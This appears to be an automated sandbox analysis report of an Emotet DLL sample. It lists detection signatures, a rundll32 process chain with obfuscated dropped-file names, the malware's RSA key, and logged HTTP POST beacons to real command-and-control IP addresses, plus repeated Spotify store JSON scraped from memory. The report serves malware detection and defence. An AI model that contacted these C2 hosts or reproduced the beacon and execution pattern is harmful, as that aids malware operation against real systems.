Loading ...

Play interactive tourEdit tour

Analysis Report zGeK5so94c

Overview

General Information

Sample Name:zGeK5so94c (renamed file extension from none to dll)
Analysis ID:344305
MD5:49fbffd7602b52f05848a6016d42ec89
SHA1:b57bb387a15b3c0e10a236f3861420a9dac980cb
SHA256:1859099c09c69aa811c525e9e70787c49048e3c24814d31ea2a17905cfad9d18

Most interesting Screenshot:

Detection

Emotet
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
Sigma detected: Suspicious Call by Ordinal
Uses known network protocols on non-standard ports
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to delete services
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains strange resources
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 7100 cmdline: loaddll32.exe 'C:\Users\user\Desktop\zGeK5so94c.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)
    • WerFault.exe (PID: 4812 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 240 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6620 cmdline: rundll32.exe C:\Users\user\Desktop\zGeK5so94c.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 1000 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Desktop\zGeK5so94c.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6040 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hbjpd\usib.lxs',dldZeiafGYsN MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • rundll32.exe (PID: 5760 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\Hbjpd\usib.lxs',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
            • rundll32.exe (PID: 5132 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\Hbjpd\pixmxoo.dll',#1 NAQAAB4AAABIAGIAagBwAGQAXAB1AHMAaQBiAC4AbAB4AHMAAAA= MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
              • rundll32.exe (PID: 5872 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hbjpd\usib.lxs',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                • rundll32.exe (PID: 6312 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hlqxmsfzi\jjvjowsk.xoz',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                  • rundll32.exe (PID: 6132 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bdtgy\atyx.hvl',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                    • rundll32.exe (PID: 1260 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cfwgvspim\fwvopxwu.wpy',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                      • rundll32.exe (PID: 6932 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ibbigqfuoubc\tiynxefumvm.jsi',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                        • rundll32.exe (PID: 6692 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Aziiwkqaqp\dnweyyfur.lyr',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                          • rundll32.exe (PID: 5360 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uchtpmhcpt\nfuoltapn.fge',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                            • rundll32.exe (PID: 5504 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zvrxg\husq.avr',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                              • rundll32.exe (PID: 4684 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jcoinynbga\etdgpznst.qoo',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                • rundll32.exe (PID: 4940 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bfurjavtsbwkajdv\sfvtpwqlhvedlny.xdk',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                  • rundll32.exe (PID: 6048 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Msjhyngbojq\bihctgwrjw.jsh',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                    • rundll32.exe (PID: 4184 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mntpro\pwmgi.sow',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                      • rundll32.exe (PID: 4632 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sioetxuvrihjyxu\wsarziebmecgqp.weo',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                        • rundll32.exe (PID: 4752 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jvotvplywpzb\qwoawgsuzao.fmz',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                          • rundll32.exe (PID: 6568 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ofqhxlaxbkixqlny\iogmsr.ktr',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                            • rundll32.exe (PID: 980 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usfyyrevasc\hoztidaylv.ruq',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                              • rundll32.exe (PID: 6020 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wzvizgyhx\mlhiyaxu.lik',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                                • rundll32.exe (PID: 5840 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tthpthgifqmjjt\idvrfaaidqwxo.flr',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                                  • rundll32.exe (PID: 6556 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jdedkdp\loyrno.rpx',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                                    • rundll32.exe (PID: 6288 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwmln\clyk.jxd',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 7108 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 7156 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7100 -ip 7100 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6848 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6788 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6008 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAKmd+Pam+7HWeoRnZCmLHfQX3/RRijh6\nbPqYGHGBBGcEQb+EOfmkdG0BnTZfvg2iXKB8yhPQsHPR9nZoyMt7OWPYA080O3zM\nzB7+nWmsc0YPpSte4JR7YPZYIpxXZs7fFwIDAQAB"}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
zGeK5so94c.dllJoeSecurity_EmotetYara detected EmotetJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.679972484.00000000729E1000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000004.00000002.678150026.00000000729E1000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000007.00000002.773552883.00000000729E1000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000006.00000002.680588418.00000000729E1000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.rundll32.exe.729e0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              4.2.rundll32.exe.729e0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                7.2.rundll32.exe.729e0000.2.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  5.2.rundll32.exe.729e0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Suspicious Call by OrdinalShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Desktop\zGeK5so94c.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Desktop\zGeK5so94c.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\zGeK5so94c.dll,Control_RunDLL, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6620, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Desktop\zGeK5so94c.dll',#1, ProcessId: 1000

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Antivirus / Scanner detection for submitted sampleShow sources
                    Source: zGeK5so94c.dllAvira: detected
                    Machine Learning detection for sampleShow sources
                    Source: zGeK5so94c.dllJoe Sandbox ML: detected
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F545700 RegOpenKeyA,EncryptFileA,VirtualAlloc,Sleep,ExitProcess,16_2_6F545700
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F542180 Sleep,Module32NextW,GetCommandLineW,CommandLineToArgvW,lstrlenW,CryptStringToBinaryW,LocalFree,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,OpenProcess,QueryFullProcessImageNameW,CloseHandle,16_2_6F542180

                    Compliance:

                    barindex
                    Uses 32bit PE filesShow sources
                    Source: zGeK5so94c.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                    Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
                    Source: zGeK5so94c.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                    Binary contains paths to debug symbolsShow sources
                    Source: Binary string: aqmjrtmCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000003.00000002.673102798.0000000002E72000.00000004.00000010.sdmp
                    Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000003.00000003.668945836.00000000050C1000.00000004.00000001.sdmp
                    Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000003.00000003.668945836.00000000050C1000.00000004.00000001.sdmp
                    Source: Binary string: wntdll.pdb source: WerFault.exe, 00000003.00000003.668945836.00000000050C1000.00000004.00000001.sdmp
                    Source: Binary string: apphelp.pdb source: WerFault.exe, 00000003.00000003.668945836.00000000050C1000.00000004.00000001.sdmp
                    Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000003.00000003.668945836.00000000050C1000.00000004.00000001.sdmp
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F558C1D FindFirstFileExA,16_2_6F558C1D

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.4:49745 -> 190.55.186.229:80
                    Source: TrafficSnort IDS: 2404326 ET CNC Feodo Tracker Reported CnC Server TCP group 14 192.168.2.4:49750 -> 203.157.152.9:7080
                    Uses known network protocols on non-standard portsShow sources
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 7080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7080 -> 49750
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 7080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7080 -> 49750
                    Source: global trafficTCP traffic: 192.168.2.4:49750 -> 203.157.152.9:7080
                    Source: Joe Sandbox ViewIP Address: 203.157.152.9 203.157.152.9
                    Source: Joe Sandbox ViewIP Address: 190.55.186.229 190.55.186.229
                    Source: Joe Sandbox ViewASN Name: MOPH-TH-APInformationTechnologyOfficeSG MOPH-TH-APInformationTechnologyOfficeSG
                    Source: Joe Sandbox ViewASN Name: TelecentroSAAR TelecentroSAAR
                    Source: global trafficTCP traffic: 192.168.2.4:49745 -> 190.55.186.229:80
                    Source: global trafficHTTP traffic detected: POST /2ijyf1/txor3som/z3prsr3ev/l8z0/1k9au09l0vb/ HTTP/1.1DNT: 0Referer: 203.157.152.9/2ijyf1/txor3som/z3prsr3ev/l8z0/1k9au09l0vb/Content-Type: multipart/form-data; boundary=---------FFexYarq3User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 203.157.152.9:7080Content-Length: 6212Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /k8idqdr2/ HTTP/1.1DNT: 0Referer: 203.157.152.9/k8idqdr2/Content-Type: multipart/form-data; boundary=-----------QeejNQ4AFByUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 203.157.152.9:7080Content-Length: 5732Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                    Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                    Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: svchost.exe, 0000000E.00000002.780262816.000001D9CB130000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
                    Source: svchost.exe, 0000000E.00000002.780262816.000001D9CB130000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
                    Source: svchost.exe, 0000000E.00000002.780262816.000001D9CB130000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-01-22T08:15:59.5362912Z||.||7d25cb34-9460-4ea4-a627-d9782709c6d8||1152921505692809496||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                    Source: svchost.exe, 0000000E.00000002.780262816.000001D9CB130000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-01-22T08:15:59.5362912Z||.||7d25cb34-9460-4ea4-a627-d9782709c6d8||1152921505692809496||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
